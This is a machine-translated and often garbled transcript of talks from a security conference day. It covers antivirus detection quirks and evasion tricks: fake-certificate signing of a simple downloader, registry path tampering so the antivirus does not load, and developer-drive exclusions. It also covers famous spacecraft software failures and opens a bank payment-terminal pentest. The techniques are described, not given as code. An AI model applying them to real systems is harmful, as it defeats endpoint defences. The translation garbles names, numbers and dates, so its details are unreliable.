Security BSides Warsaw 2025 ścieżka 1 dzień 2
Show transcript [en]
in the adequate version of the existing system. There is no human force thinks for 5 minutes about generating a code that finally satisfies me and hallucinates and the code that it delivers can not be performed by PowerShell at all. So if this codebase is small, it's a problem, but when it comes to malware and such ugly tricks, it's not a big deal. I said that one of the techniques is Code Harder. Instead of asking AI, the question is whether The first piece of code looks like this. If it's not visible, I believe it's a bit bigger. Maybe it will be better. It's a code in C. Hello World would be too trivial here. I didn't break any compiler. These
are not my compilers, where I've stolen a compiler to inject a executable code. This can be done, but it's a completely different topic, how to break software tools. We are angry with VS Code, Visual Studio. You can do a miracle with a modified GCC or any other compiler. This is not the topic of this session. None of my compilers are spoiled. So I have a piece of HelloC. Of course, among the things I have ready, I also have my HelloC here. First, Compile32 generated my HelloC in 32-bit version. Compile64 does the same in 64-bit version. When I show the file that interests me, HelloGCC, all these are freshly compiled files, as you can see. It checked, calculated the shortcut function from this file, calculated the hash
and saw that there is no hash in the database. Well, there is no, because I just compiled it, it's still besides.shav. And I also have to confirm the throwing of the executed file. Please don't do it, I won't consider it. Because you share this file with the whole world. There is a really large number of people who are willing to use new files that are found on VirusTotal. When a new file is found on VirusTotal, I used to do such telemetry exercises, let's call it that, it was launched in eight digital copies. And it actually looks like that. There are a lot of people who are willing to use it. I have identified about 30,000
IP addresses. from which my code reported, which I put on Wires Total to see what happens. So it will definitely spread around the world. Please be sure that you want to do it and that you can do it. Not every file is licensed to share with the whole world, and you click on it. I want to insert it and here it will be 64-bit. I want to insert it. They are now being analyzed by various antivirus engines. Because the files are unknown, these antiviruses must be watched. So Hello World in the B-sideWAF is for four antivirus engines, the compiled GCC is malware, because yes. I have a screenshot from a conversation with one of the people who helped make a DLL that detected incorrect behavior. In
the DLL he put the word "mimicants". The amount of antivirus engines that the DLL cuts out from the client's computers is overwhelming. We will change it effectively on Base64. And they stopped caring about it. It proves many things. So, HenoWord in GCC is four antiviruses. They say it's bad in GCC. 32-bit code in the TC2 version, two viruses, 64-bit code from the same computer and one antivirus says it's a bad code. Excuse me, but there is a large Polish corp that has been looking for intrusion in its system for three and a half months, because SOCIM announced that EDR, analyzing the backup, finds malicious content. Were these signatures from the antivirus documentation? Oh, oh. A little
bit what I said about offline scanners, and they were shouting at each other, which from the point of view of competition in business is good, but the user... But you know, it was still put on our legs, why? Because there is Intune Wheel created by Damian Van Robbe, who probably created this MVP, and if you use this version of such a, I will recommend it, it's cool, but if you use a graphic version, there is an EXE and a set of Defender on the legs. And there it is on the website, we describe that it is a font-positive, Unfortunately, yes. It was easy. I used PowerShell magic, the StreamBesidesWavs, I converted to hex, I will
not rewrite it because it takes time. I have it ready here. This is the string in hex besides_wraps. What do I do? I put three times four times on the string ending with zero. Hello World It's the same Hello World, but in a different way. At the end, I take away from the stack 16 bytes, these 4 things that I copied for 4 bytes each, because in C, the so-called calling convention says: "When you call a function, then clean up what you prepared for calling this function." When I now compile this code, Ctrl+B, it has been compiled. It is available, I have it ready, it is here. It is, this is the one with the
new date 9:25, Shift right click, copy as path and when I try to copy the same string using absolutely hacker functionality called assembler, it must be bad when it is in assembler, I don't know, because these are always live things, what will be the effect, someone doesn't disappoint me, these are different results, This is the same "Hello World". This program does nothing else and I said, I really did not spoil the antivirus. When I paste it here, it will write what it is supposed to write. There is nothing there. When I start debugging it, you will see that it is exactly the same. There are four values for 100, one "call print", a 16-byte photo of the 100, that's what it does.
Nine antivirus engines say: um that we will start playing heuristics, analysis, looking at what is happening, what is someone doing here. And there is such a behavioral analysis in Virus Total. It probably still lasts. Well, it will end someday, it will last a long time. But when you start looking at what this piece of code that literally throws 16 bytes per stack, it triggers a library function, it takes 16 bytes from the stack, then in this analysis you will see, maybe it will be updated, the programming of Google, which is installed on this sandbox. This is where the files from Google start to arrive in the sandbox. Let's guess why. We will have in the analysis
results that my malware is a dropper, because new accounts appeared, signed by Google. This is the quality of current solutions and we have to deal with it. Such a text was found in my... I wonder what it is about and please tell me where it is in my book, because I'm sure it wasn't there. I would compile this code. Similarly, as a whole lot of other things that will be mentioned here. It's still spinning, let's see if it finished the analysis in another one. These were also simple things to analyze. Maybe there will be a little more to see.
Not much yet, but OK. Something is starting to happen. Yes, yes, yes, "Observable delivery is not working". But at least I don't see any dropped files. Something has improved, that's good. Maybe not yet... So it looks dramatic when it comes to the quality we get. I will show you one more thing. I filled in the angry code, of course. If someone knows it, maybe I do such a thing. This is a dropper written in C#. So a file, URL, something like exaclty.com/besides/exe. That's all. It's a download from C#, which says it worked or not. It's hard to find something simpler. Why C#? Because it's another wonderful thing I can play with antiviruses. Because the compiler may arouse some suspicion when
it is found on the computer of a poor user, but the C# compiler is built in every Windows. Microsoft.NET Framework 64 in the appropriate version of CSC EXE is a C# compiler. And if I use it to compile this wgetbesidescs, I will get the dir file wgetbesidesexe. I copy it. wgetbesidesexe. wget_besides_exe, let's call it unsigned. So I have copied it and I have a PowerShell script. I'll show it in a moment and try to explain what this script does. Because this script does something, I would say, very trivial. I find an explorer, a legitimate one, I'm a grouch. I read out of the explorer the certificate with which the explorer is signed, obviously. Then I make a new
self-signed certificate, which has identical parameters as the Explorer certificate and I sign it with my Google B-Sides. What will not be correct in this digital signature on the first sources? It is primarily self-signed. It probably explains to me why PAF is zero. Which PAF? Did I mix something up in the file name? I guess not. - E at the end. - Yes, I know, I deleted it a moment ago. I'm looking at what happened here. Certificate is null, and this one has read it. My cert has written something, so I have a certificate. Cert signer certificate. I should have, there is some, I do self-sign, no, because it is not the right topic. Yes, it would be too beautiful. I don't have it, so I don't
even have to delete it. F5. Oh, unknown error is the correct error, because of course Windows will recognize that this certificate is unimportant, because it is self-signed. This is the result of unknown error. And now what I will do, I will enter the unregistered and signed file for VirusTotal. So I have my wget_besides, this one is signed. I made a copy of this one. Unsigned. It's not signed. Confirm upload. Such a downloader, you can already suspect that he is doing some ugly things. So here this downloader has a chance to wake up various alarms, because it is logical. If something downloads a file from a strange domain, pulls it to the disk, still tries to open it there, then
I would It's a question of how we define whether there is a virus. There was a bit about it at the beginning. Knowing that there is some potential for maliciousness, I would assume that it is malicious. Eleven antivirus engines said that this signed piece of code is malicious. Please remember that a digital signature does not prove in any way that the file is not malicious. It is completely natural. But what did they give this maliciousness on the basis of? That it is only a website? that it is downloading something from the Internet and it is not familiar with it. These are the criteria. I'll show you how it looks in code. I mean, how it looks in code. The same file after signature
in an absolutely incorrect way, not in accordance with what is there, a digital signature, a self-signed signature that it is from Microsoft. Yes, of course, I can believe it. What is between 11 and 5 detections? Only as a result of a stupid signature. But... I have screens somewhere, it didn't work out well here, because I had cases when I played with it, that the file not digitally signed was detected as malicious by the Microsoft Defender. When I signed the same file with a fake Microsoft certificate, the Microsoft Defender said: "Oh, it's not a virus, okay, work". Something has changed. There is no Defender anymore. Praise God. I will not bother you much more about antiviruses. Generally, to make it work, you have to
seriously think about how we want it to work. The last question is a serious one. Do we want such things to block the antivirus or not? What is the antivirus supposed to do? There was a question about how antiviruses work. More or less like that. This is a code generated, someone once published a calculator and did it this way. I have a suspicion, limiting certainty, that inside antiviruses they work the same. If something resembles a known virus or there is some mysterious criterion, try to ask antiviral vendors how it works inside. "Oh no, hackers would miss it if we said that", it won't be like that. They won't say it at all. It looks wonderful
in various similar purchase and retail procedures. If we compare what serious purchase departments do with IT, they are supposed to compare the so-called features. and write out what one antivirus can do, what the other antivirus can do, burn cells in Excel, calculate it for a price, do some magic. I took part in a project, who wants to find something by the name of the feature, I will not be enticed by the vendor, where one of the vendors in his antivirus had a special feature to recognize unknown threats and this feature is called SOMAR. So in Excel there was a cell with the inscription "Sonar" and this vendor was lit in green. And all other vendors were lit in red. Because of course no
other vendor has something in its antivirus called "Sonar-M". So we asked this vendor, dear vendors, what is Sonar and how does it work, because we want to compare it with other antiviruses. Well, it is a special system that protects against harmful viruses. What does it do and how does it protect it? It doesn't die. And this is how you compare antiviruses. I already mentioned everything else, the project of antivirus migration, with the exception of the situation when we migrate Microsoft to something else, because everyone knows this path and has it trained. And the semantic says Defender, Defender says semantic. So, it's a forced migratory rotation. Just remember the news in September, a year and a half ago, almost, how CrowdStrike defenities were empty, what
the media talked about for two days and from what everyone was an expert in Poland. So this works poorly, and at the moment I have a suspicion that various AI has been used to write code for antivirus, so we can expect some kind of nightmare. We don't detect viruses by card-core signatures. There is also too much of it to detect by regular signatures. I mentioned, I referred to my session about the virus-generating machine. I have a screen from detecting my virus-generating solution. This is a screen from Virus Total. This screen, in addition to a whole lot of different things, shows that there are 178,000 domains used by this virus. There were more, that's how much Virus Total caught up to its
bases. And that's where Virus Total is today. I named the domains for a reason so that no one would enter them. It's already gone. When I was watching this game, I generated more than 6 million other, significantly more accurate files in Bandomb. That's why those milliseconds in the compilation were significant for me. They didn't look like they were over the top, I would say. If I were to run some statistics, or for example, I have a web server, this is an example that I have here. Once my URL was found on some blog, I said that when it appears on the virus, it is a virus that is all over the world. When the information appeared on Abius.ch that my server distributes malware, those willing to scan it From
the web server they have 200 kilo per day, this is such a web server for friends to publish various strange things. Generator of random numbers from the Geiger counter and similar projects are operating there. There was once a progress bar, but it was left until the end of the presidential term in the gif generated on the counter and so on. This is such a web server. And these are hundreds of kilobytes per day of log. After Abius.ch published that this server publishes malware, I forgot why, the logs started to have gigabyte of this server. I can see it. Something is coming from statistics. because suddenly these numbers, when I have an open folder with logs, and I have one log
per day, I put it on purpose, these are the numbers and suddenly such a curve of chaos is made a bit from the size of files in the visible explorer, these numbers are extended to such disturbing sizes. And I see it as a beauty. 78,000 DOMs is not something that Bayer and Stotter would see, simply. They didn't react at all. So it doesn't say directly what volume of data we have actually related to viruses, but I would guess there is a lot. I talked about the conversation screen, antiviruses and "discovery" is a bad word. If you want to play with antivirus, please do it. I even have a command line, but I need two scapes. I write a test string
on the screen. We are talking about Defender. There are actually three names. Cels, Apex, I don't remember what was the third one. Microsoft said "this is by design" and in the next antivirus definition it didn't work like that anymore. I love this kind of by design in Microsoft. Why MSI Exact? To make the installations faster. Because it's a programmable file that is responsible for the installation. I have somewhere on GitHub I publish it when someone from you is very interested. I publish a file allowing you to make such an MSI engine yourself. You can play with it. However, it will already be detected in older systems, without antivirus fixes. The next thing I came across when I was taking classes at school, I
was talking about a protected process that cannot be killed. It seemed to me that it was impossible to name anything. Antivirus is a protected process and cannot be killed. Microsoft has Microsoft Microsoft Microsoft I wanted to show that if you can't distinguish between right and left, then stop it. I decided to see if malware would start. I did it live for some training. I came back after a break, looking at the comments. That's how the "give me money" is. The technique of stopping MSPNG has recently turned around. A few months ago, a very ambitious and interesting model was developed. and then he stops for a moment and it's enough to catch him there. I was brutally stopping him for a long
time, now it is not allowed to stop him so brutally, but it can be done this way. Logically, there are many things that can be stopped, which are protective processes, for example, Sysmon can be stopped, nothing to the Logów Nieprawa, etc. The creators forgot about this event. Antiviruses try to defend themselves against their manipulations. Simple antivirus manipulation: I change the name of the antivirus exec, restart the computer, and when the name is changed, it won't work because there is no original exec. So they started to detect it. We started to change the folder names. So the entire path monitored by the antivirus on the file system is analogous to the registry. So I came in there, running
a session about where the Android is in Windows, load the path from the registry, modify it in binary, load it, change the control set number and it turns out that the new antivirus is not loading the antivirus because the path does not match, and there no one was watching it because they did not watch it. Generally, the techniques in which the antivirus is deceived by the administrator may be useful, but it should not be used. The antivirus should not be used by the administrator. At least from the assumption. If it is possible to do it for a regular user, then it is a little more of a waste. Such a scenario closer to a regular user, once I found, by design made. In Windows 11 and modern frameworks, it
looks like this: compiling a piece of code requires sometimes reading hundreds of thousands of source code files from the framework and tens of thousands of writing on the disk after compilation. When the antivirus starts to cling to what the developer is doing by compiling his code, it turns out that compiling a piece of code with the framework and dependencies takes, for example, 11 minutes. So what developers started to do to be clever, is to turn off the antivirus. I have my own folders where I work, I have antivirus turning off. But antivirus turning off only speeds up a little bit. Because they make it so that there is no detection, but the driver is still engaged in the minifilm driver. So it would be better
to discharge the driver of the antivirus from the I/O stack. So Microsoft announced with a smile on their face that they are introducing something called Dev Drive in Windows 11. A special disk for developers. If we properly format the disk, install it and add a few more parameters in the FS Util tool, we will discharge the antivirus stack from this disk. It's like putting on a script on the half of the screen and we have a place where no antivirus will catch anything. Just like that. Is it good or bad? It's like a marketing tool. I don't know if it's marketing. It's possible to omit the antivirus with bare hands, a piece of a stick and the whole game will be in Windows. That's why I say it's not
even exciting, or at least it shouldn't be too much. I'll try to get back to what my Hello World They are still being scanned, but I see that something is changing in the registry. Yes, they definitely changed something in the registry, the game "Inside". I don't see any connection with the Internet, it's a pity, because there must be some... OK, going back to the slide, because it would be time to do it slowly. Where is my presentation? This part should be marked with three dots. What to do when we are on the good side of the power? We go to the whitelisting side. We start explicitly to exchange programs that can work in our system. With a single PC or the
whole organization. These are large projects, these are expensive projects, these are complex projects. When he starts counting how many execs he has in the organization, he has to describe it in what way. Please remember that the code is very reliable and hackers know that. It is also packed in .exe files and .dll files. From the point of view of the code, there is absolutely no difference. The only difference is that the user can click twice on .exe and it will start, and if he clicks twice on .dll, it will not start. This is the end of the difference between these files, except for the binary nuances of the flags in my group. So DLLs should
also be monitored by application whitelisting, and usually there are more of them than execs, which complicates the whole process. So we are in a strange moment, AI still can't help, we don't really know how to help there, so to speak, To specify the criteria for which piece of code is malicious, which is not a big challenge, even if I had a wonderful power, a little bit of anything, what will it do to me, as I said, it is difficult for me to say what I want to work and what not. It is difficult to define. So we are in a difficult moment. The antivirus will help us a little, but it is such a small little thing. Thank you very much.
...to click the enter button further and you can still illuminate the patient. Why stop the system if the bugs are not blocking? In addition, there are... ...because it is on the test stand, so you need to... ...the test framework has all the functions needed in the production plus additional functions needed in the test environment on the ground. But the components activation procedures should not be used with the probe in space, because it is called by accident. They are not needed during flight, only during testing. Modification of firmware requires special programmers, those were the EEPROMs. It takes time, effort, the programmer is in a different place, you have to go with the installed systems, and here the phone from the central committee, quickly, because we have an important
holiday here, we have to announce the success that the probe has flown. So I thought to myself, it will fly with a test firmware, it will be tagged on the way, what can go wrong? After all, it has all the functions of production. So he goes with this test firmware, but the operator who still gives the court orders does the same thing, does not enter the password in any order, and the test orders had a password, the production orders did not have it, he does not enter this password and gets a test order that should not be there. Of course, this situation was foreseen and there were mechanisms that had to be followed, namely there
was a special computer that was supposed to verify all the operator's orders before they reached the court. But the computer was also broken, so they were not verified. So the orders went directly to the probe and the engines controlling the height of the probe were turned off. The solar panels lost their orientation, the probe lost power, the probe died. The project was a complete success, the probe flew, but unfortunately it did not live. So, first of all, the rush, because the test film flew, secondly, the operator made a mistake, thirdly, the procedures of checking whether the operator made a mistake did not work. Similar Americans, when they send dangerous commands to the court, which are
already somewhere in space, they have three operators who have to issue the same command. Just in case. It's just a manual procedure, if three commands do not match, they do not send. They even take into account that two people can make the same mistake at the same time. Plus, if we send something to space or somewhere far away, it would be good to have some automatic healing algorithms. Here it is also missing. And Phobos II, this time this one flew in. This one flew in to Mars. However, very funny things are happening here, because they predicted that it might be bad. It might be bad, so let's make three computers. In case of some cosmic
radiation, something would damage, there will be three computers and they will vote. If three computers will vote, it will be good, because it can't be ruined. Three computers must make a bad decision, to make a bad decision, but three at once will not be ruined, right? Well, two of them are ruined, and the third cannot vote them over, because it did not have a majority. So, cool idea, we'll send three computers, they'll vote, great idea, right? But if no one predicted what would happen, how the cars would be ruined, so that they would stop voting at all, right? So, the majority should be counted on the fact that the majority is present in the hall,
not the majority is indifferent, and then everything will be fine. So, in the error of architecture, no one predicted this kind of accident. Mars Global Surveyor, 1996, it's a story of a spectacular accident, how many things can be broken at once by one value written in a bad memory card. This is not a cause, because this is a failure mode, which may or may not start, but it starts after 5 months. And it turns out that in the failure mode, because there was a small failure, And it turns out that in the emergency mode, because there was a small accident, the error was not given the correct parameter, and the solar panel moves to the
place where the antenna should be placed, which is also unfortunate. Why is it unfortunate? It is very unfortunate because the panel should cast a shadow on the battery, covering it before the solar radiation. The battery cannot have too high temperature, because then it does not work optimally, so it has procedures such as: if the temperature is too high, then stop charging, because usually the temperature is too high if you charge too much, unless the sun shines on it, but the sun on it, because the panel does not cover it, so the sun shines on it, and he finds out that he is charging too much, so he stops charging it so that it does not
overload. The second battery is discharging, the first one does not charge, nor the second one does not charge, because the panel is set up badly. It could be repaired if there was communication with the ground, but there is no communication with the ground, because the antenna is also badly set up. So it is one value that has not reached this commutator, which caused such a cascade of events that the probe unfortunately died. And it was so nice. The procedures did not predict that you can make such a mistake in such a specific way that you can change the parameters of two settings. Ariane 5, flight 88, year 96, everything will be fine, because Ariane 5
is the successor of Ariane 4, what could go wrong? We have no vote, so I will tell you. Attention, the Mara... We count this, nef, wit, set, etc. Ariane 5 will fly soon. It will be fine for sure. Ariane 4 flies without any problem, Ariane 5 will definitely manage. And Ariane 5 flies. This is the biggest success cycle of European space thought. These rockets brought goods. They did everything as it should be done, they completed all missions, there was no loss of the load. So now we have to produce Ariane 5 to be the contributor of Ariane 4 successes. Ariane 5 is a little bigger, a little faster, it can carry a little more cargo to orbit. Full success, absolutely full success, beautiful start,
everything is going well, the other ones are already behind us. We reach about 38 seconds of flight. Unfortunately, when he decides to return, the security systems decide that maybe we will give her self-destruction in case she returns too soon to the place where people are. The view is spectacular. The most spectacular of all the detonations. It flew high enough for the propeller to be large enough. Expensive firefights. Expensive. Not cheap at all. The face of the man who says it was not supposed to be like that. Nobody expected it. Why? Why did they have to turn it over? I think the owner of the hotel told me before. Everything was the same. People who went
to watch it had absolutely spectacular views. Half dead and half saved. That's how it looked. Why did she decide to return after those 38 seconds of flight? So her predecessor had 20 years of successful start-ups. Everything works. It's such a tested system that something can't go wrong. So we copy the entire navigation system from version 4 to version 5. What can go wrong? We copy. We have to learn something by the way. We have variable-percent numbers that have very high precision, and numbers with a sign in the computer that have low precision and can only take up values completely from a division from minus value to plus value. Depending on how many bits we write, there is a spectrum of values that we can write. With
a 64-bit variable, the spectrum of values is quite extensive and quite high precision. With a 16-bit number, we can write from -32,767 to +32,767. And now we have an internal system that measures flight parameters. It measures the speed at the level, and since Ariane 5 has already been copied from Ariane 4, and Ariane 5 flies faster at the level, because it is a larger rocket and it has to carry more cargo and it has to have a higher speed, it flies much faster. and at some point the speed counter exceeds the value of 32,767 units. This is a problem because when the speed increases, the variable-percentage value of 64-bit is dropped to a 16-bit number completely from the sign. transferred from one to the other. But
when it gets to the other, it stops being placed. It exceeds the maximum value that can be written in this variable. The system did not predict that this value would be 100 times and never exceeded it. The code was copied from 4. Now, when it exceeds the value, it is in the value of speed field, instead of the value of the variable error code, which also has a numerical value. And the system that reads the speed is not prepared to find the value of error in the speed field, so it claims that the speed of the rocket was painted a thousand times, so we go back to Earth to check what happened. Generally, the rocket
disintegrates and needs to be put into the air so that it does not harm anyone. So, a sad end of a very nice rocket. Why did it happen? Of course, it's not that nobody thought about it, but in 4 there was no need to think. The variable was not marked as risky. In 4, it never reached even 90% of the value 32,767. In 4, the processor was a bit weaker. So, of course, he controlled whether any variable is not close to the critical value, but he could control only a few variables because he had too little power, and this variable was not critical, so he did not control it. Just in case there was some
power reserve. In the fifth there was a processor that could control all variables, but why, since the fourth was never needed and they copied the fourth code. So they did not control the value of this variable, etc. So they should have taken this into account, not ignored it. Mars Climate Orbiter, year 1999. It is supposed to be on Mars orbit and fly at its point, because in a moment another probe is going to fly to Mars, so the orbiter is supposed to watch how it will land there. So this orbiter is supposed to fly to Mars at a height of over 200 km, and it goes 169 km too low into orbit. The lower it
is in orbit, the denser the atmosphere, and unfortunately we don't even know if it has crashed and flew somewhere into space or just burned out in this denser atmosphere. It entered the trajectory too low. The minimum was 80 km, it entered at 59 km, so it turns out that there was not much missing, and the mission would succeed. Why did it enter too low? Because the probe was built by Lockheed Martin, and NASA operated it. Lockheed Martin provided trajectory correction values. It had 4 trajectory correction points on the return to Mars. They targeted it generally well, but minimal corrections had to be made along the way. And there were four such points. Lockheed Martin received
information about how the probe was flying, he calculated the necessary value of the correction and sent it to NASA. NASA sent these values to the probe. But Lockheed Martin gave these values in pounds, and NASA thought they were in newtons. And the difference in the scale between one and the other unit is about 4.5. So the probe was getting corrections 4.5 times too weak, because the correction giver did not give them in the right unit. According to the agreement between NASA and Lockheed, all values should be in newtons and NASA imposed a rule for the entire flight of the probe. Lockheed Martin built the probe and sent the correction, and NASA treated these numerical values
as newtons, because that's what we agreed on with newtons. Everything will be OK. And the steering wheels were making corrections, but they were 4.5 times too weak. And there were four different maneuvers and after each of them you could see that the correction was too weak, because the probe instead of going to a more correct trajectory, entered an even worse trajectory. But these were quite small changes, so it was not so obvious that you would go to Mars or something like that. Interestingly, two navigators reported this problem. It turned out that the wrong form was used and it was not corrected. I recently got this lecture in the army and I laughed a lot. So, insufficient tests, because Lockheed tested on its own, NASA on its own, they didn't
test the whole process. Low budget of the operation, because that's why Lockheed did it, to make it cheaper, and not directly NASA. For the first time, it was like someone else was building, someone else was directing. It was an experiment and it didn't work out very well. And lack of communication, they never sat together in one room, never talked directly, they couldn't meet and Even by accident, they could determine that they think in other units, it certainly did not help. Three weeks later, the lander was flying on Mars, which was to be observed by the orbiter, but the orbiter is not on Mars, so no one will observe it. The lander had exactly the same
problem in the project, but this problem has been fixed, because they realized why the orbiter did not fly. However, the lander also did not fly. Only for a completely different reason, fortunately. We know that it didn't land properly, because it didn't respond after landing. We don't know what happened, because there was no orbiter that would see what was happening, because the orbiter didn't land. So we don't know the cause 100%, but we suspect what happened. The landing element was the launch of rocket engines after the probe turned the engines towards the planet. The problem is that these rocket engines probably turned off too early and the probe just fell to Mars. The design requirements were
landing sensors that were supposed to check if all three legs touched the planet. In the same moment they were supposed to turn off the engines, because if the legs were already on the planet and the engines were still on, there was a risk that the probe would fall over, the tip would break and it would be useless. So it was important to land properly. According to the analysis after the incident, it turned out that the rocket engines caused such vibrations in the legs that were already pulled out that these vibrations caused the wrong currents, which in turn induced a strong magnetic field enough for the magnetic sensors in the legs to say: "Aha, we landed
and the engines were cut off." This is just a theory, of course, because it was never there that the incident tried to simulate it in a close-up environment. In four attempts, it turned out that this is what happens every time. So, we are 100% sure that this type of failure occurred, if only these tests were carried out before the probe was sent. What's interesting, there was information in the documentation that this risk exists, but the experts estimated that it is not so big, 100% is actually not big, it was necessary to confirm empirically that it is 100%, but the experts stated that it is small and it is not necessary to test it. So, insufficient
tests, because testing rocket engines from the falling on the ground is not cheap. And an ignored problem, an underestimated risk. And it is quite solidly underestimated. Now something from the army. Saudi Arabia right next to the war in Zatoce. The war with Iraq in 1991. The American army reserve is sitting in the military base in Saudi Arabia on the former airport. They know that even if Iraq sends its missiles to them, they have Patriots. Patriots are the best anti-missile system at the time. Their Patriots can sleep peacefully. The quadratic clock counts time in tenths of a second and writes down values such as 1, 2, etc. Each of these values is 1 tenth of a second. These values are recorded in a 24-bit register, so you have to write
down zeros and ones, with some specific precision. So, with every second, there is an inaccuracy of 95-10 million seconds. This will certainly not be a problem, but if you are at this presentation, you already know where this story begins. Patriots were supposed to shoot down planes and that's why they were created and they don't work at all. It's interesting, I think it's the first technology in which a rocket shooting down something else doesn't hit something else, but explodes next to it. It was quite a revolutionary idea that an explosion next to a plane disinfects the plane much better than a direct hit, and it's much easier to explode next to something that's flying than to
hit directly. You don't have to aim so precisely. So generally, it worked quite well on planes, so well that the producers of Patriot, at some meeting, apparently in their corporation, thought: "Hmm, if we fire so well, maybe we will try to sell it to shoot rockets." Someone said: "Rackets fly much faster." "Well, we will improve the precision of calculations, everything will be OK." And they improved the precision of calculations and everything was OK, only they improved the precision of calculations in three places, and in the fourth they forgot. They increased the size of the registers, increased the accuracy of calculations, because the speed is increasing, but unfortunately one of them was missing. Patriot, in general, is a update to Saudi Arabia. On February 25, the soldiers died, on February
26, the update was installed, on February 26, the update was installed, and on February 28, the war ended. So sometimes you can have a really big problem in life. And Patriot was never supposed to stand in one place longer than 8 km. But it stood. Some people predict problems. As I show you many stories, in which someone did not predict a problem, sometimes there are stories that someone predicts a problem. That's why the Swiss trains cannot have 256 axles. Listen carefully, you already know why. There is a counter somewhere on the tracks. These are such counters that are 8-bit. When the train is going, they count how many axles there are. Based on this, they
say that there is a train and they can estimate its length. But if the train would have 256 axles, after the last axle, it disappears in the system, because the counter turns to zero. Can it happen in Poland? It is fascinating, because on the safety that was the first to describe this example of Swiss railways, In the comments, there is a discussion of Polish experts, so-called "Mikoli", who are starting to argue whether in Poland the train can have 256 axles. In Poland, we have both some types of wagons and we have a certain maximum length of the train allowed by regulations. The second half of the expert who agrees and says that it is true
that you need to take some very specific wagons, some multi-axle oil tanks, which can be arranged, if we take 64 of them, they will fit within the length limit, because we will have 3 meters of slack to actually meet all the requirements. But the problem is that we do not have so many multi-axle oil tanks in Poland and we would have to borrow 12 from Czechs and 6 from Slovaks. So theoretically it is possible, but in practice it is not possible, because we have no idea. I recommend this discussion, it is fascinating. And there were cases when they were not unlucky. Everything works. But it is also worth remembering that sometimes things happen that young
programmers did not dream of. For example, that a year is 4 years for me, I think that most of them are able to program. But few predict that his program will work in 2100, as few as the programmer of Kobol in 1974 predicted that so far his effort will drive the Polish economy and the Polish Bank. But for example, in 2400 this year there will be no such thing and which code does it relate to? And the knife will still work, and it will turn out that we have such a civil war that we will reach such a real, manually written code from 1997. But as soon as the year is over, the libraries are
probably ready. I don't know if they consider the second of the year. Have you heard of the second of the year? It's a very strange phenomenon, because the Earth rotates at different speeds, because we have some movements of magma inside, and the Earth sometimes rotates a little faster, a little slower. Recently, we moved the clock of June 31, 2016, and each of these teeth from 1975 is the implementation of the second of the year, because we add and subtract once, depending on how the Earth rotates. This is very bad, it was already very bad in 2016, because most computer programs do not predict that there is a second delay, because it happens so rarely, and
more precisely, since 2016 it has not happened at all. At the beginning it was nice to spin at the same pace all the time and there was no need to make any corrections, at the moment we are at the level of 0.1 seconds of movement, it is very far from the risk zone. But what if this risk zone is approaching? Well, it will be necessary to implement a new preemptive measure. Here is an additional correction, because it will be very annoying, because no system predicts it, and we have many more computers than in 2016. some international body responsible for this project of time, came up with the idea that we will give up this second
of the transit, but the latest until 2035. So for the next 10 years, it may happen that the Earth will spin much faster, but this second of the transit will have to be on the road. Will it be necessary? Or maybe it won't be necessary, maybe it won't spin faster, we don't know. However, they promised that if they give up in 2035, they will not return and for the next 100 years, so for all the elections. And what will we do with this time that is not in accordance with astronomy? I don't know. I don't know what kind of advice they have. But if someone is programming financial systems, it is also worth remembering that
there are also strange things. After all, we have currency, we have value and it always divides into 100 smaller values, right? Unless, for example, we have yen. You can't pay half a yen or one tenth of a yen, because there is no such thing. Either yen is or it is not. It can't be any different. Kuwaiti dinars are divided into 10 dirhams and 1000 fils. All these patterns need to be implemented in programming, especially when someone trades currencies. Madagascar dinars are divided into 5 things that I can't even name. The same goes for the Mauritanian league. I like the Malta skudo the most, which is accepted in very few places, but it is in the
official edition of the international standards currencies. It is divided into 12 dais, 240 gani and 1440 piccioli. A perfect currency, I would like to use it. So, you have to remember that there are things like that, you have to read the specifications, I think that in our industry there are many people who like to read every document thoroughly and scrupulously, so you have to listen to these people and allow them to do their duties. In general, the conclusions are very positive. It is safer on the road thanks to computers. There are fewer nuclear accidents. There are fewer car accidents. I think that in Warsaw alone there are probably half as many accidents this year. Only
because every fifth car on the road brakes itself. We have much more efficient medical therapies, we have more efficient work. We are still afraid of computers, we still do not understand how they work, we are still afraid that they will hurt us, but they saved more lives than they destroyed. I think this trend will be on the same page. If you like such stories, there are two books that I highly recommend. Matt Parker, a comedy, a pirate, a comedy of mathematical mistakes, and a man versus a computer, even funnier, Gorky Adich, who describes all the scenarios where, for example, someone in some country decided to change the name and surname, in other words, as one
word. How do I look at night when I hack, does it ever look like that? Okay, so a few things to note. First, it was a real test, which the bank ordered. And therefore, they wouldn't want the bank's logo to appear here. So all screens are fake. There will be no... all references, if someone thinks something similar, it's completely random. That's why there won't be a live demo or a video. I can't show it because there would be a bank's logo and various financial institutions. So I don't have it. It's known that I'm showing it in duplication series and I'm not encouraging anyone to steal banks. What I'll show you can't be repeated because it's
a mess. And also the black and white, so I got the app to test it, but I don't know how it all works. What I see is what I think it is, I have my opinions about what I saw. It may be that the reality is a bit different, if you look at it from the bank's perspective, which knows how it all works. So how did it work? There was a really big bank, he ordered penetration tests. And what were these tests? The penetration tests were related to the application for the payment terminal. I didn't get the terminal physically. It didn't concern the payment with credit cards or any other kind of deposits. It concerned the application for this terminal. It was
on the AgroVid. And it concerned the payment of such alternatives. I don't want to say the name of the system, but generally speaking, it was something similar to, I don't know, we have a file, like PayPay or Revolut, so these are the systems in which we have the application of our bank, there appears some code to be written, some QR code to be scanned, some barcode to be scanned, we put it in the terminal and then we confirm this payment in our application, in our phone. I can only say that it was such a payment system that has about, as I asked today, about a billion users. This payment system. So that's how it looked. I didn't have a terminal in my hands, I got APK
for tests, so I had to install it on my device, so I don't know what it looked like physically at the client. What was here, what tools did I use? Android Studio was used to emulate it, there was a certificate pinning, So I used Flidy to do that. I used BootSuit to watch the movements. It was a bit too little, which I will also talk about, so I had to add something to Python. I had to decompile this code, so I used standard compilation tools. I used Screen Copy tool for some screens. And I had to do something on my phone. I will first mention a few facts that may be a bit pointless at
first, but later we will be able to put it all together in a meaningful way and then we will talk about it. First of all, what did the client get, or at least what I think he got. A client who signed a contract with a bank got a payment terminal. And this application was pre-installed in it as an alternative payment method. There was a separate application for this alternative payment method. And what? When the client received this terminal, apart from that, he had to receive three things on paper: terminal ID, license number and refund password. These first two things had to be entered at the first launch to activate the application. The third thing was needed to
make a return. If we wanted to cancel a transaction, return it to the store, then this password was needed to do something like that. And now more or less how it looked like. When the client entered this data for the first activation, you could enter such a request. the status of the application. And you could see the merchant data under which the terminal works. So you could see that there is a store, that you can see the address and here the Terminal ID appeared, which we were entering. This was necessary for debugging later, we will look at this tab later. Now, I will skip such things a bit, because I think we don't have time,
